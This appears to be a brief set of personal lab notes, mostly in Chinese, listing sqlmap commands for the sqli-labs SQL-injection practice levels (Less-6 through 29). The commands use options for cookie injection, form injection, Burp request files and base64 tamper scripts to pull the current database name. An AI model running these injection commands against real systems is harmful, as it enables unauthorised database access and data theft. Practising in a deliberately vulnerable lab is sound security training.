1.labs1-9
python sqlmap.py -u "http://caichuanqi.cn/lab/sqli-labs-master/Less-6/?id=1" --current-db --batch --threads 10 --dbms mysql
2.第10关
python sqlmap.py -u "http://caichuanqi.cn/lab/sqli-labs-master/Less-10/?id=1" --current-db --batch --threads 10 --dbms mysql --level 3 --risk 3
3.第11关-16
python sqlmap.py -u "http://caichuanqi.cn/lab/sqli-labs-master/Less-16/" --current-db --batch --threads 10 --dbms mysql --level 5 --risk 3 --forms
4.第17关-19
抓包跑
python sqlmap.py -r "burp.txt" --batch --threads 10 --dbms=mysql -o --current-db
5.第20关
python sqlmap.py -u "http://127.0.0.1/sqli/Less-20/" -cookie="uname=admin*" --threads=10 -o --batch --level=2 --current-db

6.第21关

python sqlmap.py -u "http://127.0.0.1/sqli/Less-21/" --cookie="uname=admin*" --threads=10 -o --batch --level=2 --current-db --technique=U --tamper=base64encode.py这个脚本默认编码payload base64

22关

python sqlmap.py -u "http://127.0.0.1/sqli/Less-22/" --cookie="uname=*" --threads=10 -o --batch --level=2 --current-db --technique=U --tamper=base64encode.py

29关

sqlmap -u "/login.php?id=1&id=1*" --batch -- technique=U --bds